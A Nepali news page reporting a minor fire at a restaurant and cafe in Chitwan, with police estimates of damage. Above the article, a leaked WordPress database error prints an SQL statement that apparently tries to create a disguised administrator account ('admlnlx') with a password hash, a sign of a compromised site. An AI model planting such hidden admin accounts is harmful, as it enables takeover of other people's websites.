WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BYrueooWon9akz.f4weUHqSGuCbM8M1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 17:22:24', '', 'admlnlx', 'admlnlx')
सबिता अधिकारी
चितवन,फागुन ४ –
चितवनको कविलास १ जुगेडीको एभोकाडो रेस्टुरेन्ट एन्ड क्याफेमा आज आगलागी भएको छ । क्याफे नजिक रहेको कागजको थुप्रोवाट आगो सल्किएर क्याफेको किचन जलेको र सिसा फुटेको चितवन जिल्ला प्रहरीका साहयक प्रहरी निरिक्षक गौतम पाण्डेले जानाकारी दिए । करिव एक लाख वरावरको क्षति भएको पाण्डेले वताए ।उनका अनुसार आगलागी दिउसो १ वजे भएको र आगो दमकल प्रहरी ,स्थानियको सहयोगमा नियन्त्रणमा आएको थियो ।